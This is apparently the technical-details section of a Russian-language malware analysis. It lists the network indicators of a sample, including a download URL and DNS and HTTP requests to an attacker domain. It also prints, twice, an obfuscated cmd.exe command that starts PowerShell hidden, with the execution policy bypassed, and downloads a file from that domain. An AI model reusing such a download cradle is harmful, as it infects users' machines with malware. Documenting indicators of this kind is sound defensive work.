Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWE^r^sH^ElL.EX^E -ExecutiOnP^oL^icY B^YpA^Ss -nOp^roF^i^l^e -^WI^N^DOW^S^Tyle^ hi^DDE^N (NEW-oB^jE^cT ^sYS^teM.n^ET.we^BcL^IEnT).^dO^W^nLo^aD^Fi^L^e('http://asecwitlecn.bid/rea...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "P^oWE^r^sH^ElL.EX^E -ExecutiOnP^oL^icY B^YpA^Ss -nOp^roF^i^l^e -^WI^N^DOW^S^Tyle^ hi^DDE^N (NEW-oB^jE^cT ^sYS^teM.n^ET.we^BcL^IEnT).^dO^W^nLo^aD^Fi^L^e('http://asecwitlecn.bid/rea...' (со скрытым окном)